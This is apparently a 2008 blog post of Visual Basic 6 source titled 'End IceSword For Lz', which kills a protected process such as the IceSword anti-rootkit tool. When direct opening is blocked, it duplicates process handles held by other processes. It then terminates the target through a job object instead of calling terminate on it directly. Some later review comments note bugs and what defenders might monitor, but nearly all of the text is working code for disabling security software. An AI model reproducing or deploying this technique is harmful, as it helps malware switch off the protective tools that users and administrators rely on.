End IceSword For Lz
作者:JiaJia 日期:2008-01-24

//form
Option Explicit
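Private Sub Command1_Click()
    ' Click handler: reads a process ID from Text1, passes it to TerminateProc
    ' and reports "成功" (success) or "失败" (failure) in a message box.
    Dim pidText As String
    Dim pid As Long

    pidText = Trim$(Text1.Text)

    ' Validate the input explicitly. The previous On Error Resume Next skipped
    ' the whole MsgBox statement when the text could not be converted to a
    ' Long, so a bad PID produced no feedback at all.
    If Not IsNumeric(pidText) Then
        MsgBox "失败"
        Exit Sub
    End If

    ' CLng can still overflow on numeric text outside the Long range, and the
    ' native calls below may raise; report either as a failure.
    On Error GoTo ReportFailure
    pid = CLng(pidText)
    MsgBox IIf(TerminateProc(pid), "成功", "失败")
    Exit Sub

ReportFailure:
    MsgBox "失败"
End Sub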
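Private Function TerminateProc(ByVal pid As Long) As Boolean
    ' Opens the process identified by pid through the module's OpenProcess
    ' wrapper, asks the module's TerminateProcess wrapper to end it, and
    ' closes the handle. Returns True only when TerminateProcess reports
    ' success.
    Dim hproc As Long

    hproc = OpenProcess(PROCESS_ALL_ACCESS, False, pid)

    ' OpenProcess leaves its result at 0 when no handle could be obtained.
    ' Stop here instead of handing a null handle to TerminateProcess and
    ' ZwClose; the function result stays False.
    If hproc = 0 Then Exit Function

    TerminateProc = TerminateProcess(hproc, 0)
    ZwClose (hproc)
End Function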
//module
Option Explicit
Private Sub CopyMemory(ByVal Dest As Long, ByVal Src As Long, ByVal cch As Long)
    ' Copies cch bytes from address Src to address Dest by issuing
    ' ZwWriteVirtualMemory against the handle returned by ZwCurrentProcess.
    ' The byte count reported by the call and its status are both discarded,
    ' so a failed or partial copy is not visible to the caller.
    Dim bytesWritten As Long
    ZwWriteVirtualMemory ZwCurrentProcess, Dest, Src, cch, bytesWritten
End Sub
' Returns a handle to the process ProcessId opened with dwDesiredAccess, or 0
' when no handle could be obtained. The original author notes that the caller
' needs SE_DEBUG (the debug privilege) before calling this function.
' Two stages are visible in the body:
'   1. a direct ZwOpenProcess on the target;
'   2. if that fails, a walk over the system handle table that duplicates
'      process handles held by other processes and keeps one that refers to
'      ProcessId.
' NOTE(review): the name matches the kernel32 OpenProcess API; callers in this
' project presumably resolve to this wrapper - confirm against the Declares.
' Monitoring note: stage 2 is observable as one process opening many others
' with PROCESS_DUP_HANDLE and duplicating process handles out of them; that
' pattern, and which processes hold handles to a protected process, is what a
' defender would review.
Public Function OpenProcess(ByVal dwDesiredAccess As Long, _
ByVal bInhert As Boolean, _
ByVal ProcessId As Long) As Long
Dim st As Long
Dim cid As CLIENT_ID
Dim oa As OBJECT_ATTRIBUTES
Dim NumOfHandle As Long
Dim pbi As PROCESS_BASIC_INFORMATION
Dim I As Long
Dim hProcessToDup As Long, hProcessCur As Long, hProcessToRet As Long
' Record the structure's own size in its Length field.
oa.Length = Len(oa)
If (bInhert) Then oa.Attributes = oa.Attributes Or OBJ_INHERIT
cid.UniqueProcess = ProcessId
' Stage 1: direct open. On success the handle is returned immediately.
st = ZwOpenProcess(hProcessToRet, dwDesiredAccess, oa, cid)
If (NT_SUCCESS(st)) Then OpenProcess = hProcessToRet: Exit Function
st = 0
' Stage 2: fetch the system handle table. The buffer starts tiny and is
' doubled each time the query reports STATUS_INFO_LENGTH_MISMATCH; any other
' failure frees the buffer and returns 0.
Dim bytBuf() As Byte
Dim arySize As Long: arySize = 1
Do
ReDim bytBuf(arySize)
st = ZwQuerySystemInformation(SystemHandleInformation, VarPtr(bytBuf(0)), arySize, 0&)
If (Not NT_SUCCESS(st)) Then
If (st <> STATUS_INFO_LENGTH_MISMATCH) Then
Erase bytBuf
Exit Function
End If
Else
Exit Do
End If
arySize = arySize * 2
' NOTE(review): this ReDim is repeated at the top of the loop, so it looks redundant.
ReDim bytBuf(arySize)
Loop
' The first Long in the buffer is read as the number of handle entries.
NumOfHandle = 0
Call CopyMemory(VarPtr(NumOfHandle), VarPtr(bytBuf(0)), Len(NumOfHandle))
Dim h_info() As SYSTEM_HANDLE_TABLE_ENTRY_INFO
' NOTE(review): with the default lower bound of 0 this allocates NumOfHandle + 1
' elements while only NumOfHandle are copied, so the loop below also visits one
' zero-filled entry - confirm Option Base.
ReDim h_info(NumOfHandle)
' assumes the entry array starts immediately after the count field - TODO confirm
' against the declared structure layout
Call CopyMemory(VarPtr(h_info(0)), VarPtr(bytBuf(0)) + Len(NumOfHandle), Len(h_info(0)) * NumOfHandle)
For I = LBound(h_info) To UBound(h_info)
With h_info(I)
If (.ObjectTypeIndex = OB_TYPE_PROCESS) Then 'OB_TYPE_PROCESS is hard-coded; the author recommends obtaining it dynamically
' Open the process that owns this handle entry, asking only for the right to
' duplicate its handles.
cid.UniqueProcess = .UniqueProcessId
st = ZwOpenProcess(hProcessToDup, PROCESS_DUP_HANDLE, oa, cid)
If (NT_SUCCESS(st)) Then
' First duplicate: a working copy used only to ask which process the handle
' refers to.
st = ZwDuplicateObject(hProcessToDup, .HandleValue, ZwGetCurrentProcess, hProcessCur, PROCESS_ALL_ACCESS, 0, DUPLICATE_SAME_ATTRIBUTES)
If (NT_SUCCESS(st)) Then
st = ZwQueryInformationProcess(hProcessCur, ProcessBasicInformation, VarPtr(pbi), Len(pbi), 0)
If (NT_SUCCESS(st)) Then
If (pbi.UniqueProcessId = ProcessId) Then
' Second duplicate: the handle handed back to the caller, with the access
' mask the caller asked for.
' NOTE(review): OBJ_INHERIT is passed here regardless of bInhert.
st = ZwDuplicateObject(hProcessToDup, .HandleValue, ZwGetCurrentProcess, hProcessToRet, dwDesiredAccess, OBJ_INHERIT, DUPLICATE_SAME_ATTRIBUTES)
' NOTE(review): the loop keeps running after a match, so a later match would
' overwrite the result without closing the earlier handle.
If (NT_SUCCESS(st)) Then OpenProcess = hProcessToRet
End If
End If
End If
' NOTE(review): this close runs even when the first duplicate failed, in which
' case hProcessCur still holds whatever value an earlier iteration left in it.
st = ZwClose(hProcessCur)
End If
' NOTE(review): likewise executed when the ZwOpenProcess above failed.
st = ZwClose(hProcessToDup)
End If
End With
Next
' bytBuf is not erased on this path; only h_info is released explicitly.
Erase h_info
End Function
' Ends the process behind hProcess by way of a job object: a job is created,
' the process is assigned to it, and the job is terminated with ExitStatus.
' Returns True only when all three calls succeed; the job handle is closed
' whenever it was created.
' NOTE(review): the name matches the kernel32 TerminateProcess API; callers in
' this project presumably resolve to this wrapper - confirm against the Declares.
' Monitoring note: no direct terminate call is made on the process handle, so
' the observable sequence is job creation followed by assignment of a process
' the caller did not start.
Public Function TerminateProcess(ByVal hProcess As Long, _
                                 ByVal ExitStatus As Long) As Boolean
    Dim jobAttrs As OBJECT_ATTRIBUTES
    Dim jobHandle As Long
    Dim ntStatus As Long

    jobAttrs.Length = Len(jobAttrs)

    ' Without a job object nothing else can be done; the result stays False.
    ntStatus = ZwCreateJobObject(jobHandle, JOB_OBJECT_ALL_ACCESS, jobAttrs)
    If Not NT_SUCCESS(ntStatus) Then Exit Function

    ntStatus = ZwAssignProcessToJobObject(jobHandle, hProcess)
    If NT_SUCCESS(ntStatus) Then
        ntStatus = ZwTerminateJobObject(jobHandle, ExitStatus)
        If NT_SUCCESS(ntStatus) Then TerminateProcess = True
    End If

    ' Release the job handle on both the success and the failure path.
    ZwClose (jobHandle)
End Function